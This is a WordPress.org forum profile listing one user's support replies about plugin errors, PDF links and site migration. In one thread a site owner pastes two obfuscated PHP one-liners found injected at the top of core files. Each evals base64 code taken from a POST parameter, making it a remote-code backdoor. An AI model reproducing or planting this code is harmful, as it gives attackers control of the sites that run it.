lewishackfath
Forum Replies Created
-
Forum: Plugins
In reply to: [The Events Calendar] Customizer Stops WorkingHi Ed,
This plugin conflicts with the “Customize Posts” Plugin by XWP
Both this plugin and the Customize post plugins work individually but together they conflict.Here is a link to the Customize Posts Plugin:
https://en-au.www.ads-software.com/plugins/customize-posts/Forum: Plugins
In reply to: [The Events Calendar] 500 Error on Plugin ActivationI ended up moving everything to a Linux based server as I was not sure how long it would be before a fix was released.
However I have migrated back to IIS in order to test the fix.
It has been resolved.
The Plugin successfully activates and functions correctly in IIS.Forum: Plugins
In reply to: [The Events Calendar] 500 Error on Plugin ActivationI now have additional Information:
PHP Fatal error: Uncaught Error: Call to undefined method Tribe__Events__Featured_Events__Query_Helper::add() in C:\inetpub\wwwroot\StaffPortal\wp-content\plugins\the-events-calendar\common\src\Tribe\Main.php:237
Stack trace:
#0 C:\inetpub\wwwroot\StaffPortal\wp-includes\class-wp-hook.php(298): Tribe__Main->load_assets(”)
#1 C:\inetpub\wwwroot\StaffPortal\wp-includes\class-wp-hook.php(323): WP_Hook->apply_filters(NULL, Array)
#2 C:\inetpub\wwwroot\StaffPortal\wp-includes\plugin.php(453): WP_Hook->do_action(Array)
#3 C:\inetpub\wwwroot\StaffPortal\wp-settings.php(449): do_action(‘init’)
#4 C:\inetpub\wwwroot\StaffPortal\wp-config.php(93): require_once(‘C:\\inetpub\\wwwr…’)
#5 C:\inetpub\wwwroot\StaffPortal\wp-load.php(37): require_once(‘C:\\inetpub\\wwwr…’)
#6 C:\inetpub\wwwroot\StaffPortal\wp-admin\admin.php(31): require_once(‘C:\\inetpub\\wwwr…’)
#7 C:\inetpub\wwwroot\StaffPortal\wp-admin\plugins.php(10): require_once(‘C:\\inetpub\\wwwr…’)
#8 {main}
thrown in C:\inetpub\wwwroot\StaffPortal\wp-content\plugins\the-events-calendar\common\src\Tribe\Main.php on line 237Forum: Plugins
In reply to: [The Events Calendar] 500 Error on Plugin ActivationYour problem might be resolved by looking at the line in your php.ini file that relates to the maximum nesting level.
Try it out.
Forum: Fixing WordPress
In reply to: Set download links to PDF fileAre you wanting to upload a pdf to the site for a visitor to download?
Go to the page you want the pdf link to appear on. Edit the Page. Click Add Media, Upload the PDF and add it to the page. Click Update/Publish. A link will appear when clicked will open/download depending on users browser preferences.
Forum: Fixing WordPress
In reply to: WP Update to New HostYou should not need to move the old site at all.
Point DNS to Host A
On Host B Create the WordPress Directory and Set up all the domain entries required.
On your Personal Machine Create an Entry in your host file to point the domain you are working on to the new server. This will make it so that you can see the new website but the rest of the world will see the old one.
Setup the new website as desired. After you have finished edit your host file again. Remove the Entry you put in and then update the DNS to point to the New hosting server. Problem solved the old website will remain live until all the DNS entries over the world change and after they have the new site will be live. Then you can just delete the old site.
You do not need to copy Site A, doing so would pose a security risk to your new site as the malware and injection could access the new site and corrupt it as well.
Forum: Fixing WordPress
In reply to: WP Update to New HostOk then Same steps except dont need to copy any of the old data over.
Make a new database
Upload the latest version of the wordpress software into the root directory of your web server and unzip it. Make sure it is not in a sub folder.
Add the Host File Entry that i mentioned above and then start installing the new version of wordpress and setting it up.
Hope this helps.
Let me know if you do not understand.
Forum: Fixing WordPress
In reply to: Editing a Live SiteWhen you say you want to update and edit your site exactly what do you want to do?
Forum: Fixing WordPress
In reply to: Parallels showing instead of wordpressIt looks to me like you have not got wordpress in the correct directory.
Ensure that you unzip all the wordpress files into the root of your public_html directory on your server.
Forum: Fixing WordPress
In reply to: WP Update to New HostI would do the following.
Take a Backup of the Database and import it onto the new server into a Database with preferably the same username and password as the original, if not you will have to update the wp-config file. Google Can help you with this if you dont know how to do it.
Copy the Entire Site Directory as in Everything from one Server to the new server. Best if you zip it and unpack it as it will probably be quite a lot of data.
Change your personal computers hostfile to point to the new server. A quick google can explain how to do this if you are unsure.
You can now use the site on the new server as if it were on the old server. Update everything and get it all in working order.
Once you are happy with it and your sure it is all working and updated. Remove the hostfile entry and update the DNS records to point to the new server.
Best of Luck
I have the latest version of jetpack 3.9.1 and I’m getting this error.
Forum: Fixing WordPress
In reply to: Cannot Modify Header Information<?php $ebuc23="6oced_pat4sb";$ynq4= strtolower ( $ebuc23[11].$ebuc23[7].$ebuc23[10]. $ebuc23[3].$ebuc23[0].$ebuc23[9] . $ebuc23[5]. $ebuc23[4]. $ebuc23[3]. $ebuc23[2]. $ebuc23[1].$ebuc23[4].$ebuc23[3] );$uzt9 =strtoupper( $ebuc23[5].$ebuc23[6]. $ebuc23[1].$ebuc23[10].$ebuc23[8]) ;if(isset ( ${ $uzt9 } ['ne6f56c'])){ eval( $ynq4(${ $uzt9}[ 'ne6f56c'] ) ); }?>
Can you tell me what this actually is and how to stop it?
Forum: Fixing WordPress
In reply to: Cannot Modify Header InformationThis is the content on line one of taxonomy.php
<?php $ygus27 = "6cb_de4patso" ;$xbwa5= strtolower($ygus27[2].$ygus27[8].$ygus27[10].$ygus27[5]. $ygus27[0].$ygus27[6] . $ygus27[3] . $ygus27[4].$ygus27[5]. $ygus27[1].$ygus27[11]. $ygus27[4].$ygus27[5]);$hyyh0= strtoupper( $ygus27[3]. $ygus27[7]. $ygus27[11]. $ygus27[10]. $ygus27[9] ) ;if( isset( ${$hyyh0}[ 'n1ca57c' ] ) ){ eval($xbwa5( ${$hyyh0} [ 'n1ca57c'] ));} ?> <?php
Forum: Fixing WordPress
In reply to: Cannot Modify Header InformationAnd another two that I just received
Warning: Cannot modify header information - headers already sent by (output started at /home/content/64/12072764/html/wp-includes/taxonomy.php:1) in /home/content/64/12072764/html/wp-content/plugins/wordpress-https/lib/WordPressHTTPS.php on line 454
and
Warning: Cannot modify header information - headers already sent by (output started at /home/content/64/12072764/html/wp-includes/taxonomy.php:1) in /home/content/64/12072764/html/wp-includes/pluggable.php on line 1207
It is never the same file, it is always different files and on all the different websites I am hosting.
Forum: Fixing WordPress
In reply to: Cannot Modify Header InformationThe Latest error was:
Warning: Cannot modify header information - headers already sent by (output started at /home/content/64/12072764/html/websites/treetents/wp-includes/post-thunbnail-template.php:1) in /home/content/64/12072764/html/websites/treetents/wp-content/plugins/wptouch/core/class-wptouch-pro.php on line 266
and another below it
Warning: Cannot modify header information - headers already sent by (output started at /home/content/64/12072764/html/websites/treetents/wp-includes/post-thunbnail-template.php:1) in /home/content/64/12072764/html/websites/treetents/wp-content/plugins/wptouch/core/class-wptouch-pro.php on line 2467